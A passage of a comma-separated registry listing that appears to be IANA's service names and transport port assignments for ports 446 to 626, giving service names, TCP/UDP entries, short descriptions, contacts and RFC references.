ddm-rdb,446,tcp,DDM-Remote Relational Database Access,,,,,,,, ddm-rdb,446,udp,DDM-Remote Relational Database Access,,,,,,,, ddm-dfm,447,tcp,DDM-Distributed File Management,[Steven_Ritland],[Steven_Ritland],,,,,, ddm-dfm,447,udp,DDM-Distributed File Management,[Steven_Ritland],[Steven_Ritland],,,,,, ddm-ssl,448,tcp,DDM-Remote DB Access Using Secure Sockets,[Steven_Ritland],[Steven_Ritland],,,,,, ddm-ssl,448,udp,DDM-Remote DB Access Using Secure Sockets,[Steven_Ritland],[Steven_Ritland],,,,,, as-servermap,449,tcp,AS Server Mapper,[Barbara_Foss],[Barbara_Foss],,,,,, as-servermap,449,udp,AS Server Mapper,[Barbara_Foss],[Barbara_Foss],,,,,, tserver,450,tcp,Computer Supported Telecomunication Applications,[Harvey_S_Schultz],[Harvey_S_Schultz],,,,,, tserver,450,udp,Computer Supported Telecomunication Applications,[Harvey_S_Schultz],[Harvey_S_Schultz],,,,,, sfs-smp-net,451,tcp,Cray Network Semaphore server,,,,,,,, sfs-smp-net,451,udp,Cray Network Semaphore server,,,,,,,, sfs-config,452,tcp,Cray SFS config server,[Walter_Poxon],[Walter_Poxon],,,,,, sfs-config,452,udp,Cray SFS config server,[Walter_Poxon],[Walter_Poxon],,,,,, creativeserver,453,tcp,CreativeServer,,,,,,,, creativeserver,453,udp,CreativeServer,,,,,,,, contentserver,454,tcp,ContentServer,,,,,,,, contentserver,454,udp,ContentServer,,,,,,,, creativepartnr,455,tcp,CreativePartnr,[Jesus_Ortiz],[Jesus_Ortiz],,,,,, creativepartnr,455,udp,CreativePartnr,[Jesus_Ortiz],[Jesus_Ortiz],,,,,, macon-tcp,456,tcp,macon-tcp,[Yoshinobu_Inoue],[Yoshinobu_Inoue],,,,,, macon-udp,456,udp,macon-udp,[Yoshinobu_Inoue],[Yoshinobu_Inoue],,,,,, scohelp,457,tcp,scohelp,[Faith_Zack],[Faith_Zack],,,,,, scohelp,457,udp,scohelp,[Faith_Zack],[Faith_Zack],,,,,, appleqtc,458,tcp,apple quick time,[Murali_Ranganathan],[Murali_Ranganathan],,,,,, appleqtc,458,udp,apple quick time,[Murali_Ranganathan],[Murali_Ranganathan],,,,,, ampr-rcmd,459,tcp,ampr-rcmd,[Rob_Janssen],[Rob_Janssen],,,,,, ampr-rcmd,459,udp,ampr-rcmd,[Rob_Janssen],[Rob_Janssen],,,,,, skronk,460,tcp,skronk,[Henry_Strickland],[Henry_Strickland],,,,,, skronk,460,udp,skronk,[Henry_Strickland],[Henry_Strickland],,,,,, datasurfsrv,461,tcp,DataRampSrv,,,,,,,, datasurfsrv,461,udp,DataRampSrv,,,,,,,, datasurfsrvsec,462,tcp,DataRampSrvSec,[Diane_Downie],[Diane_Downie],,,,,, datasurfsrvsec,462,udp,DataRampSrvSec,[Diane_Downie],[Diane_Downie],,,,,, alpes,463,tcp,alpes,[Alain_Durand],[Alain_Durand],,,,,, alpes,463,udp,alpes,[Alain_Durand],[Alain_Durand],,,,,, kpasswd,464,tcp,kpasswd,[Theodore_Ts_o],[Theodore_Ts_o],,,,,, kpasswd,464,udp,kpasswd,[Theodore_Ts_o],[Theodore_Ts_o],,,,,, urd,465,tcp,URL Rendesvous Directory for SSM,[Toerless_Eckert],[Toerless_Eckert],,,,,, igmpv3lite,465,udp,IGMP over UDP for SSM,[Toerless_Eckert],[Toerless_Eckert],,,,,, digital-vrc,466,tcp,digital-vrc,[Peter_Higginson],[Peter_Higginson],,,,,, digital-vrc,466,udp,digital-vrc,[Peter_Higginson],[Peter_Higginson],,,,,, mylex-mapd,467,tcp,mylex-mapd,[Gary_Lewis],[Gary_Lewis],,,,,, mylex-mapd,467,udp,mylex-mapd,[Gary_Lewis],[Gary_Lewis],,,,,, photuris,468,tcp,proturis,[Bill_Simpson_2],[Bill_Simpson_2],,,,,, photuris,468,udp,proturis,[Bill_Simpson_2],[Bill_Simpson_2],,,,,, rcp,469,tcp,Radio Control Protocol,[Jim_Jennings],[Jim_Jennings],,,,,, rcp,469,udp,Radio Control Protocol,[Jim_Jennings],[Jim_Jennings],,,,,, scx-proxy,470,tcp,scx-proxy,[Scott_Narveson],[Scott_Narveson],,,,,, scx-proxy,470,udp,scx-proxy,[Scott_Narveson],[Scott_Narveson],,,,,, mondex,471,tcp,Mondex,[Bill_Reding],[Bill_Reding],,,,,, mondex,471,udp,Mondex,[Bill_Reding],[Bill_Reding],,,,,, ljk-login,472,tcp,ljk-login,[LJK],[LJK],,,,,, ljk-login,472,udp,ljk-login,[LJK],[LJK],,,,,, hybrid-pop,473,tcp,hybrid-pop,[Rami_Rubin],[Rami_Rubin],,,,,, hybrid-pop,473,udp,hybrid-pop,[Rami_Rubin],[Rami_Rubin],,,,,, tn-tl-w1,474,tcp,tn-tl-w1,,,,,,,, tn-tl-w2,474,udp,tn-tl-w2,[Ed_Kress],[Ed_Kress],,,,,, tcpnethaspsrv,475,tcp,tcpnethaspsrv,[Michael_Zunke],[Michael_Zunke],2010-07-23,,,,, tcpnethaspsrv,475,udp,tcpnethaspsrv,[Michael_Zunke],[Michael_Zunke],2010-07-23,,,,, tn-tl-fd1,476,tcp,tn-tl-fd1,[Ed_Kress],[Ed_Kress],,,,,, tn-tl-fd1,476,udp,tn-tl-fd1,[Ed_Kress],[Ed_Kress],,,,,, ss7ns,477,tcp,ss7ns,[Jean_Michel_URSCH],[Jean_Michel_URSCH],,,,,, ss7ns,477,udp,ss7ns,[Jean_Michel_URSCH],[Jean_Michel_URSCH],,,,,, spsc,478,tcp,spsc,[Mike_Rieker],[Mike_Rieker],,,,,, spsc,478,udp,spsc,[Mike_Rieker],[Mike_Rieker],,,,,, iafserver,479,tcp,iafserver,,,,,,,, iafserver,479,udp,iafserver,,,,,,,, iafdbase,480,tcp,iafdbase,[Rick_Yazwinski],[Rick_Yazwinski],,,,,, iafdbase,480,udp,iafdbase,[Rick_Yazwinski],[Rick_Yazwinski],,,,,, ph,481,tcp,Ph service,[Roland_Hedberg],[Roland_Hedberg],,,,,, ph,481,udp,Ph service,[Roland_Hedberg],[Roland_Hedberg],,,,,, bgs-nsi,482,tcp,bgs-nsi,[Jon_Saperia],[Jon_Saperia],,,,,, bgs-nsi,482,udp,bgs-nsi,[Jon_Saperia],[Jon_Saperia],,,,,, ulpnet,483,tcp,ulpnet,[Kevin_Mooney],[Kevin_Mooney],,,,,, ulpnet,483,udp,ulpnet,[Kevin_Mooney],[Kevin_Mooney],,,,,, integra-sme,484,tcp,Integra Software Management Environment,[Randall_Dow],[Randall_Dow],,,,,, integra-sme,484,udp,Integra Software Management Environment,[Randall_Dow],[Randall_Dow],,,,,, powerburst,485,tcp,Air Soft Power Burst,[gary],[gary],,,,,, powerburst,485,udp,Air Soft Power Burst,[gary],[gary],,,,,, avian,486,tcp,avian,[Robert_Ullmann_2],[Robert_Ullmann_2],,,,,, avian,486,udp,avian,[Robert_Ullmann_2],[Robert_Ullmann_2],,,,,, saft,487,tcp,saft Simple Asynchronous File Transfer,[Ulli_Horlacher],[Ulli_Horlacher],,,,,, saft,487,udp,saft Simple Asynchronous File Transfer,[Ulli_Horlacher],[Ulli_Horlacher],,,,,, gss-http,488,tcp,gss-http,[Doug_Rosenthal],[Doug_Rosenthal],,,,,, gss-http,488,udp,gss-http,[Doug_Rosenthal],[Doug_Rosenthal],,,,,, nest-protocol,489,tcp,nest-protocol,[Gilles_Gameiro],[Gilles_Gameiro],,,,,, nest-protocol,489,udp,nest-protocol,[Gilles_Gameiro],[Gilles_Gameiro],,,,,, micom-pfs,490,tcp,micom-pfs,[David_Misunas],[David_Misunas],,,,,, micom-pfs,490,udp,micom-pfs,[David_Misunas],[David_Misunas],,,,,, go-login,491,tcp,go-login,[Troy_Morrison],[Troy_Morrison],,,,,, go-login,491,udp,go-login,[Troy_Morrison],[Troy_Morrison],,,,,, ticf-1,492,tcp,Transport Independent Convergence for FNA,,,,,,,, ticf-1,492,udp,Transport Independent Convergence for FNA,,,,,,,, ticf-2,493,tcp,Transport Independent Convergence for FNA,[Mamoru_Ito],[Mamoru_Ito],,,,,, ticf-2,493,udp,Transport Independent Convergence for FNA,[Mamoru_Ito],[Mamoru_Ito],,,,,, pov-ray,494,tcp,POV-Ray,[POV_Team_Co_ordinato],[POV_Team_Co_ordinato],,,,,, pov-ray,494,udp,POV-Ray,[POV_Team_Co_ordinato],[POV_Team_Co_ordinato],,,,,, intecourier,495,tcp,intecourier,[Steve_Favor],[Steve_Favor],,,,,, intecourier,495,udp,intecourier,[Steve_Favor],[Steve_Favor],,,,,, pim-rp-disc,496,tcp,PIM-RP-DISC,[Dino_Farinacci],[Dino_Farinacci],,,,,, pim-rp-disc,496,udp,PIM-RP-DISC,[Dino_Farinacci],[Dino_Farinacci],,,,,, retrospect,497,tcp,Retrospect backup and restore service,[Retrospect_Inc],[JG_Heithcock],,2012-02-02,,,, retrospect,497,udp,Retrospect backup and restore service,[Retrospect_Inc],[JG_Heithcock],,2012-02-02,,,, siam,498,tcp,siam,[Philippe_Gilbert],[Philippe_Gilbert],,,,,, siam,498,udp,siam,[Philippe_Gilbert],[Philippe_Gilbert],,,,,, iso-ill,499,tcp,ISO ILL Protocol,[Mark_H_Needleman],[Mark_H_Needleman],,,,,, iso-ill,499,udp,ISO ILL Protocol,[Mark_H_Needleman],[Mark_H_Needleman],,,,,, isakmp,500,tcp,isakmp,[Mark_Schertler],[Mark_Schertler],,,,,, isakmp,500,udp,isakmp,[Mark_Schertler],[Mark_Schertler],,,,,, stmf,501,tcp,STMF,[Alan_Ungar],[Alan_Ungar],,,,,, stmf,501,udp,STMF,[Alan_Ungar],[Alan_Ungar],,,,,, mbap,502,tcp,Modbus Application Protocol,[modbus.org],[Dennis_Dube],,2014-06-10,,,, mbap,502,udp,Modbus Application Protocol,[modbus.org],[Dennis_Dube],,2014-06-10,,,, intrinsa,503,tcp,Intrinsa,[Robert_Ford],[Robert_Ford],,,,,, intrinsa,503,udp,Intrinsa,[Robert_Ford],[Robert_Ford],,,,,, citadel,504,tcp,citadel,[Art_Cancro],[Art_Cancro],,,,,, citadel,504,udp,citadel,[Art_Cancro],[Art_Cancro],,,,,, mailbox-lm,505,tcp,mailbox-lm,[Beverly_Moody],[Beverly_Moody],,,,,, mailbox-lm,505,udp,mailbox-lm,[Beverly_Moody],[Beverly_Moody],,,,,, ohimsrv,506,tcp,ohimsrv,[Scott_Powell],[Scott_Powell],,,,,, ohimsrv,506,udp,ohimsrv,[Scott_Powell],[Scott_Powell],,,,,, crs,507,tcp,crs,[Brad_Wright],[Brad_Wright],,,,,, crs,507,udp,crs,[Brad_Wright],[Brad_Wright],,,,,, xvttp,508,tcp,xvttp,[Keith_J_Alphonso],[Keith_J_Alphonso],,,,,, xvttp,508,udp,xvttp,[Keith_J_Alphonso],[Keith_J_Alphonso],,,,,, snare,509,tcp,snare,[Dennis_Batchelder],[Dennis_Batchelder],,,,,, snare,509,udp,snare,[Dennis_Batchelder],[Dennis_Batchelder],,,,,, fcp,510,tcp,FirstClass Protocol,[Mike_Marshburn],[Mike_Marshburn],,,,,, fcp,510,udp,FirstClass Protocol,[Mike_Marshburn],[Mike_Marshburn],,,,,, passgo,511,tcp,PassGo,[John_Rainford],[John_Rainford],,,,,, passgo,511,udp,PassGo,[John_Rainford],[John_Rainford],,,,,, exec,512,tcp,remote process execution; authentication performed using passwords and UNIX login names,,,,,,,, comsat,512,udp,,,,,,,,, biff,512,udp,used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine,,,,,,,, login,513,tcp,"remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify ""authentication domains""",,,,,,,, who,513,udp,maintains data bases showing who's logged in to machines on a local net and the load average of the machine,,,,,,,, shell,514,tcp,"cmd like exec, but automatic authentication is performed as for login server",,,,,,,, syslog,514,udp,,,,,,,,, printer,515,tcp,spooler,,,,,,,, printer,515,udp,spooler,,,,,,,, videotex,516,tcp,videotex,[Daniel_Mavrakis],[Daniel_Mavrakis],,,,,, videotex,516,udp,videotex,[Daniel_Mavrakis],[Daniel_Mavrakis],,,,,, talk,517,tcp,"like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established)",,,,,,,, talk,517,udp,"like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established)",,,,,,,, ntalk,518,tcp,,,,,,,,, ntalk,518,udp,,,,,,,,, utime,519,tcp,unixtime,,,,,,,, utime,519,udp,unixtime,,,,,,,, efs,520,tcp,extended file name server,,,,,,,, router,520,udp,local routing process (on site); uses variant of Xerox NS routing information protocol - RIP,,,,,,,, ripng,521,tcp,ripng,[Robert_E_Minnear],[Robert_E_Minnear],,,,,, ripng,521,udp,ripng,[Robert_E_Minnear],[Robert_E_Minnear],,,,,, ulp,522,tcp,ULP,[Max_Morris],[Max_Morris],,,,,, ulp,522,udp,ULP,[Max_Morris],[Max_Morris],,,,,, ibm-db2,523,tcp,IBM-DB2,[Juliana_Hsu],[Juliana_Hsu],,,,,, ibm-db2,523,udp,IBM-DB2,[Juliana_Hsu],[Juliana_Hsu],,,,,, ncp,524,tcp,NCP,[Don_Provan_2],[Don_Provan_2],,,,,, ncp,524,udp,NCP,[Don_Provan_2],[Don_Provan_2],,,,,, timed,525,tcp,timeserver,,,,,,,, timed,525,udp,timeserver,,,,,,,, tempo,526,tcp,newdate,,,,,,,, tempo,526,udp,newdate,,,,,,,, stx,527,tcp,Stock IXChange,[Fraxion_Software],[Ferdi_Ladeira],,2012-03-21,,,, stx,527,udp,Stock IXChange,[Fraxion_Software],[Ferdi_Ladeira],,2012-03-21,,,, custix,528,tcp,Customer IXChange,[Fraxion_Software],[Ferdi_Ladeira],,2012-03-21,,,, custix,528,udp,Customer IXChange,[Fraxion_Software],[Ferdi_Ladeira],,2012-03-21,,,, irc-serv,529,tcp,IRC-SERV,[Brian_Tackett],[Brian_Tackett],,,,,, irc-serv,529,udp,IRC-SERV,[Brian_Tackett],[Brian_Tackett],,,,,, courier,530,tcp,rpc,,,,,,,, courier,530,udp,rpc,,,,,,,, conference,531,tcp,chat,,,,,,,, conference,531,udp,chat,,,,,,,, netnews,532,tcp,readnews,,,,,,,, netnews,532,udp,readnews,,,,,,,, netwall,533,tcp,for emergency broadcasts,[Andreas_Heidemann],[Andreas_Heidemann],,,,,, netwall,533,udp,for emergency broadcasts,[Andreas_Heidemann],[Andreas_Heidemann],,,,,, windream,534,tcp,windream Admin,[Uwe_Honermann],[Uwe_Honermann],,,,,, windream,534,udp,windream Admin,[Uwe_Honermann],[Uwe_Honermann],,,,,, iiop,535,tcp,iiop,[Jeff_M_Michaud],[Jeff_M_Michaud],,,,,, iiop,535,udp,iiop,[Jeff_M_Michaud],[Jeff_M_Michaud],,,,,, opalis-rdv,536,tcp,opalis-rdv,[Laurent_Domenech],[Laurent_Domenech],,,,,, opalis-rdv,536,udp,opalis-rdv,[Laurent_Domenech],[Laurent_Domenech],,,,,, nmsp,537,tcp,Networked Media Streaming Protocol,[Paul_Santinelli_Jr],[Paul_Santinelli_Jr],,,,,, nmsp,537,udp,Networked Media Streaming Protocol,[Paul_Santinelli_Jr],[Paul_Santinelli_Jr],,,,,, gdomap,538,tcp,gdomap,[Richard_Frith_Macdon],[Richard_Frith_Macdon],,,,,, gdomap,538,udp,gdomap,[Richard_Frith_Macdon],[Richard_Frith_Macdon],,,,,, apertus-ldp,539,tcp,Apertus Technologies Load Determination,,,,,,,, apertus-ldp,539,udp,Apertus Technologies Load Determination,,,,,,,, uucp,540,tcp,uucpd,,,,,,,, uucp,540,udp,uucpd,,,,,,,, uucp-rlogin,541,tcp,uucp-rlogin,[Stuart_Lynne],[Stuart_Lynne],,,,,, uucp-rlogin,541,udp,uucp-rlogin,[Stuart_Lynne],[Stuart_Lynne],,,,,, commerce,542,tcp,commerce,[Randy_Epstein],[Randy_Epstein],,,,,, commerce,542,udp,commerce,[Randy_Epstein],[Randy_Epstein],,,,,, klogin,543,tcp,,,,,,,,, klogin,543,udp,,,,,,,,, kshell,544,tcp,krcmd,,,,,,,, kshell,544,udp,krcmd,,,,,,,, appleqtcsrvr,545,tcp,appleqtcsrvr,[Murali_Ranganathan],[Murali_Ranganathan],,,,,, appleqtcsrvr,545,udp,appleqtcsrvr,[Murali_Ranganathan],[Murali_Ranganathan],,,,,, dhcpv6-client,546,tcp,DHCPv6 Client,,,,,,,, dhcpv6-client,546,udp,DHCPv6 Client,,,,,,,, dhcpv6-server,547,tcp,DHCPv6 Server,[Jim_Bound],[Jim_Bound],,,,,, dhcpv6-server,547,udp,DHCPv6 Server,[Jim_Bound],[Jim_Bound],,,,,, afpovertcp,548,tcp,AFP over TCP,[Leland_Wallace],[Leland_Wallace],,,,,,Defined TXT keys: u= p= path= afpovertcp,548,udp,AFP over TCP,[Leland_Wallace],[Leland_Wallace],,,,,,Defined TXT keys: u= p= path= idfp,549,tcp,IDFP,[Ramana_Kovi],[Ramana_Kovi],,,,,, idfp,549,udp,IDFP,[Ramana_Kovi],[Ramana_Kovi],,,,,, new-rwho,550,tcp,new-who,,,,,[n/a],,, new-rwho,550,udp,new-who,,,,,[n/a],,, cybercash,551,tcp,cybercash,[Donald_E_Eastlake],[Donald_E_Eastlake],,,[RFC1898],,, cybercash,551,udp,cybercash,[Donald_E_Eastlake],[Donald_E_Eastlake],,,[RFC1898],,, devshr-nts,552,tcp,DeviceShare,[Benjamin_Rosenberg],[Benjamin_Rosenberg],,,,,, devshr-nts,552,udp,DeviceShare,[Benjamin_Rosenberg],[Benjamin_Rosenberg],,,,,, pirp,553,tcp,pirp,[D_J_Bernstein],[D_J_Bernstein],,,,,, pirp,553,udp,pirp,[D_J_Bernstein],[D_J_Bernstein],,,,,, rtsp,554,tcp,Real Time Streaming Protocol (RTSP),[Rob_Lanphier],[Rob_Lanphier],,,,,, rtsp,554,udp,Real Time Streaming Protocol (RTSP),[Rob_Lanphier],[Rob_Lanphier],,,,,, dsf,555,tcp,,,,,,,,, dsf,555,udp,,,,,,,,, remotefs,556,tcp,rfs server,,,,,,,, remotefs,556,udp,rfs server,,,,,,,, openvms-sysipc,557,tcp,openvms-sysipc,[Alan_Potter],[Alan_Potter],,,,,, openvms-sysipc,557,udp,openvms-sysipc,[Alan_Potter],[Alan_Potter],,,,,, sdnskmp,558,tcp,SDNSKMP,,,,,,,, sdnskmp,558,udp,SDNSKMP,,,,,,,, teedtap,559,tcp,TEEDTAP,[Charlie_Limoges],[Charlie_Limoges],,,,,, teedtap,559,udp,TEEDTAP,[Charlie_Limoges],[Charlie_Limoges],,,,,, rmonitor,560,tcp,rmonitord,,,,,,,, rmonitor,560,udp,rmonitord,,,,,,,, monitor,561,tcp,,,,,,,,, monitor,561,udp,,,,,,,,, chshell,562,tcp,chcmd,,,,,,,, chshell,562,udp,chcmd,,,,,,,, nntps,563,tcp,nntp protocol over TLS/SSL (was snntp),[Kipp_E_B_Hickman_2],[Kipp_E_B_Hickman_2],,,,,, nntps,563,udp,nntp protocol over TLS/SSL (was snntp),[Kipp_E_B_Hickman_2],[Kipp_E_B_Hickman_2],,,,,, 9pfs,564,tcp,plan 9 file service,,,,,,,, 9pfs,564,udp,plan 9 file service,,,,,,,, whoami,565,tcp,whoami,,,,,,,, whoami,565,udp,whoami,,,,,,,, streettalk,566,tcp,streettalk,,,,,,,, streettalk,566,udp,streettalk,,,,,,,, banyan-rpc,567,tcp,banyan-rpc,[Tom_Lemaire],[Tom_Lemaire],,,,,, banyan-rpc,567,udp,banyan-rpc,[Tom_Lemaire],[Tom_Lemaire],,,,,, ms-shuttle,568,tcp,microsoft shuttle,[Rudolph_Balaz],[Rudolph_Balaz],,,,,, ms-shuttle,568,udp,microsoft shuttle,[Rudolph_Balaz],[Rudolph_Balaz],,,,,, ms-rome,569,tcp,microsoft rome,[Rudolph_Balaz],[Rudolph_Balaz],,,,,, ms-rome,569,udp,microsoft rome,[Rudolph_Balaz],[Rudolph_Balaz],,,,,, meter,570,tcp,demon,,,,,,,, meter,570,udp,demon,,,,,,,, meter,571,tcp,udemon,,,,,,,, meter,571,udp,udemon,,,,,,,, sonar,572,tcp,sonar,[Keith_Moore],[Keith_Moore],,,,,, sonar,572,udp,sonar,[Keith_Moore],[Keith_Moore],,,,,, banyan-vip,573,tcp,banyan-vip,[Denis_Leclerc],[Denis_Leclerc],,,,,, banyan-vip,573,udp,banyan-vip,[Denis_Leclerc],[Denis_Leclerc],,,,,, ftp-agent,574,tcp,FTP Software Agent System,[Michael_S_Greenberg],[Michael_S_Greenberg],,,,,, ftp-agent,574,udp,FTP Software Agent System,[Michael_S_Greenberg],[Michael_S_Greenberg],,,,,, vemmi,575,tcp,VEMMI,[Daniel_Mavrakis_2],[Daniel_Mavrakis_2],,,,,, vemmi,575,udp,VEMMI,[Daniel_Mavrakis_2],[Daniel_Mavrakis_2],,,,,, ipcd,576,tcp,ipcd,,,,,,,, ipcd,576,udp,ipcd,,,,,,,, vnas,577,tcp,vnas,,,,,,,, vnas,577,udp,vnas,,,,,,,, ipdd,578,tcp,ipdd,[Jay_Farhat],[Jay_Farhat],,,,,, ipdd,578,udp,ipdd,[Jay_Farhat],[Jay_Farhat],,,,,, decbsrv,579,tcp,decbsrv,[Rudi_Martin],[Rudi_Martin],,,,,, decbsrv,579,udp,decbsrv,[Rudi_Martin],[Rudi_Martin],,,,,, sntp-heartbeat,580,tcp,SNTP HEARTBEAT,[Louis_Mamakos_2],[Louis_Mamakos_2],,,,,, sntp-heartbeat,580,udp,SNTP HEARTBEAT,[Louis_Mamakos_2],[Louis_Mamakos_2],,,,,, bdp,581,tcp,Bundle Discovery Protocol,[Gary_Malkin],[Gary_Malkin],,,,,, bdp,581,udp,Bundle Discovery Protocol,[Gary_Malkin],[Gary_Malkin],,,,,, scc-security,582,tcp,SCC Security,[Prashant_Dholakia],[Prashant_Dholakia],,,,,, scc-security,582,udp,SCC Security,[Prashant_Dholakia],[Prashant_Dholakia],,,,,, philips-vc,583,tcp,Philips Video-Conferencing,[Janna_Chang],[Janna_Chang],,,,,, philips-vc,583,udp,Philips Video-Conferencing,[Janna_Chang],[Janna_Chang],,,,,, keyserver,584,tcp,Key Server,[Gary_Howland],[Gary_Howland],,,,,, keyserver,584,udp,Key Server,[Gary_Howland],[Gary_Howland],,,,,, ,585,,De-registered,,,,2006-04-25,,,,"Use of 585 is not recommended, use 993 instead" password-chg,586,tcp,Password Change,,,,,,,, password-chg,586,udp,Password Change,,,,,,,, submission,587,tcp,Message Submission,,,,2011-11-17,[RFC6409],,, submission,587,udp,Message Submission,,,,2011-11-17,[RFC6409],,, cal,588,tcp,CAL,[Myron_Hattig],[Myron_Hattig],,,,,, cal,588,udp,CAL,[Myron_Hattig],[Myron_Hattig],,,,,, eyelink,589,tcp,EyeLink,[Dave_Stampe],[Dave_Stampe],,,,,, eyelink,589,udp,EyeLink,[Dave_Stampe],[Dave_Stampe],,,,,, tns-cml,590,tcp,TNS CML,[Jerome_Albin],[Jerome_Albin],,,,,, tns-cml,590,udp,TNS CML,[Jerome_Albin],[Jerome_Albin],,,,,, http-alt,591,tcp,"FileMaker, Inc. - HTTP Alternate (see Port 80)",[Clay_Maeckel],[Clay_Maeckel],,,,,, http-alt,591,udp,"FileMaker, Inc. - HTTP Alternate (see Port 80)",[Clay_Maeckel],[Clay_Maeckel],,,,,, eudora-set,592,tcp,Eudora Set,[Randall_Gellens],[Randall_Gellens],,,,,, eudora-set,592,udp,Eudora Set,[Randall_Gellens],[Randall_Gellens],,,,,, http-rpc-epmap,593,tcp,HTTP RPC Ep Map,[Edward_Reus],[Edward_Reus],,,,,, http-rpc-epmap,593,udp,HTTP RPC Ep Map,[Edward_Reus],[Edward_Reus],,,,,, tpip,594,tcp,TPIP,[Brad_Spear],[Brad_Spear],,,,,, tpip,594,udp,TPIP,[Brad_Spear],[Brad_Spear],,,,,, cab-protocol,595,tcp,CAB Protocol,[Winston_Hetherington],[Winston_Hetherington],,,,,, cab-protocol,595,udp,CAB Protocol,[Winston_Hetherington],[Winston_Hetherington],,,,,, smsd,596,tcp,SMSD,[Wayne_Barlow],[Wayne_Barlow],,,,,, smsd,596,udp,SMSD,[Wayne_Barlow],[Wayne_Barlow],,,,,, ptcnameservice,597,tcp,PTC Name Service,[Yuri_Machkasov],[Yuri_Machkasov],,,,,, ptcnameservice,597,udp,PTC Name Service,[Yuri_Machkasov],[Yuri_Machkasov],,,,,, sco-websrvrmg3,598,tcp,SCO Web Server Manager 3,[Simon_Baldwin],[Simon_Baldwin],,,,,, sco-websrvrmg3,598,udp,SCO Web Server Manager 3,[Simon_Baldwin],[Simon_Baldwin],,,,,, acp,599,tcp,Aeolon Core Protocol,[Michael_Alyn_Miller],[Michael_Alyn_Miller],,,,,, acp,599,udp,Aeolon Core Protocol,[Michael_Alyn_Miller],[Michael_Alyn_Miller],,,,,, ipcserver,600,tcp,Sun IPC server,[Bill_Schiefelbein],[Bill_Schiefelbein],,,,,, ipcserver,600,udp,Sun IPC server,[Bill_Schiefelbein],[Bill_Schiefelbein],,,,,, syslog-conn,601,tcp,Reliable Syslog Service,,,,,[RFC3195],,, syslog-conn,601,udp,Reliable Syslog Service,,,,,[RFC3195],,, xmlrpc-beep,602,tcp,XML-RPC over BEEP,,,,,[RFC3529],,, xmlrpc-beep,602,udp,XML-RPC over BEEP,,,,,[RFC3529],,, idxp,603,tcp,IDXP,,,,,[RFC4767],,, idxp,603,udp,IDXP,,,,,[RFC4767],,, tunnel,604,tcp,TUNNEL,,,,,[RFC3620],,, tunnel,604,udp,TUNNEL,,,,,[RFC3620],,, soap-beep,605,tcp,SOAP over BEEP,,,,,[RFC4227],,, soap-beep,605,udp,SOAP over BEEP,,,,,[RFC4227],,, urm,606,tcp,Cray Unified Resource Manager,,,,,,,, urm,606,udp,Cray Unified Resource Manager,,,,,,,, nqs,607,tcp,nqs,[Bill_Schiefelbein],[Bill_Schiefelbein],,,,,, nqs,607,udp,nqs,[Bill_Schiefelbein],[Bill_Schiefelbein],,,,,, sift-uft,608,tcp,Sender-Initiated/Unsolicited File Transfer,[Rick_Troth],[Rick_Troth],,,,,, sift-uft,608,udp,Sender-Initiated/Unsolicited File Transfer,[Rick_Troth],[Rick_Troth],,,,,, npmp-trap,609,tcp,npmp-trap,,,,,,,, npmp-trap,609,udp,npmp-trap,,,,,,,, npmp-local,610,tcp,npmp-local,,,,,,,, npmp-local,610,udp,npmp-local,,,,,,,, npmp-gui,611,tcp,npmp-gui,[John_Barnes],[John_Barnes],,,,,, npmp-gui,611,udp,npmp-gui,[John_Barnes],[John_Barnes],,,,,, hmmp-ind,612,tcp,HMMP Indication,,,,,,,, hmmp-ind,612,udp,HMMP Indication,,,,,,,, hmmp-op,613,tcp,HMMP Operation,[Andrew_Sinclair],[Andrew_Sinclair],,,,,, hmmp-op,613,udp,HMMP Operation,[Andrew_Sinclair],[Andrew_Sinclair],,,,,, sshell,614,tcp,SSLshell,[Simon_J_Gerraty],[Simon_J_Gerraty],,,,,, sshell,614,udp,SSLshell,[Simon_J_Gerraty],[Simon_J_Gerraty],,,,,, sco-inetmgr,615,tcp,Internet Configuration Manager,,,,,,,, sco-inetmgr,615,udp,Internet Configuration Manager,,,,,,,, sco-sysmgr,616,tcp,SCO System Administration Server,,,,,,,, sco-sysmgr,616,udp,SCO System Administration Server,,,,,,,, sco-dtmgr,617,tcp,SCO Desktop Administration Server,[Christopher_Durham],[Christopher_Durham],,,,,, sco-dtmgr,617,udp,SCO Desktop Administration Server,[Christopher_Durham],[Christopher_Durham],,,,,, dei-icda,618,tcp,DEI-ICDA,[David_Turner],[David_Turner],,,,,, dei-icda,618,udp,DEI-ICDA,[David_Turner],[David_Turner],,,,,, compaq-evm,619,tcp,Compaq EVM,[Jem_Treadwell],[Jem_Treadwell],,,,,, compaq-evm,619,udp,Compaq EVM,[Jem_Treadwell],[Jem_Treadwell],,,,,, sco-websrvrmgr,620,tcp,SCO WebServer Manager,[Christopher_Durham],[Christopher_Durham],,,,,, sco-websrvrmgr,620,udp,SCO WebServer Manager,[Christopher_Durham],[Christopher_Durham],,,,,, escp-ip,621,tcp,ESCP,[Lai_Zit_Seng],[Lai_Zit_Seng],,,,,, escp-ip,621,udp,ESCP,[Lai_Zit_Seng],[Lai_Zit_Seng],,,,,, collaborator,622,tcp,Collaborator,[Johnson_Davis],[Johnson_Davis],,,,,, collaborator,622,udp,Collaborator,[Johnson_Davis],[Johnson_Davis],,,,,, oob-ws-http,623,tcp,DMTF out-of-band web services management protocol,[Jim_Davis],[Jim_Davis],2007-06,,,,, asf-rmcp,623,udp,ASF Remote Management and Control Protocol,[Carl_First],[Carl_First],,,,,, cryptoadmin,624,tcp,Crypto Admin,[Tony_Walker],[Tony_Walker],,,,,, cryptoadmin,624,udp,Crypto Admin,[Tony_Walker],[Tony_Walker],,,,,, dec-dlm,625,tcp,"DEC DLM IANA assigned this well-formed service name as a replacement for ""dec_dlm"".",[Rudi_Martin_2],[Rudi_Martin_2],,,,,, dec_dlm,625,tcp,DEC DLM,[Rudi_Martin_2],[Rudi_Martin_2],,,,,,"This entry is an alias to ""dec-dlm"". This entry is now historic, not usable for use with many common service discovery mechanisms." dec-dlm,625,udp,"DEC DLM IANA assigned this well-formed service name as a replacement for ""dec_dlm"".",[Rudi_Martin_2],[Rudi_Martin_2],,,,,, dec_dlm,625,udp,DEC DLM,[Rudi_Martin_2],[Rudi_Martin_2],,,,,,"This entry is an alias to ""dec-dlm"". This entry is now historic, not usable for use with many common service discovery mechanisms." asia,626,tcp,ASIA,[Michael_Dasenbrock],[Michael_Dasenbrock],,,,,, 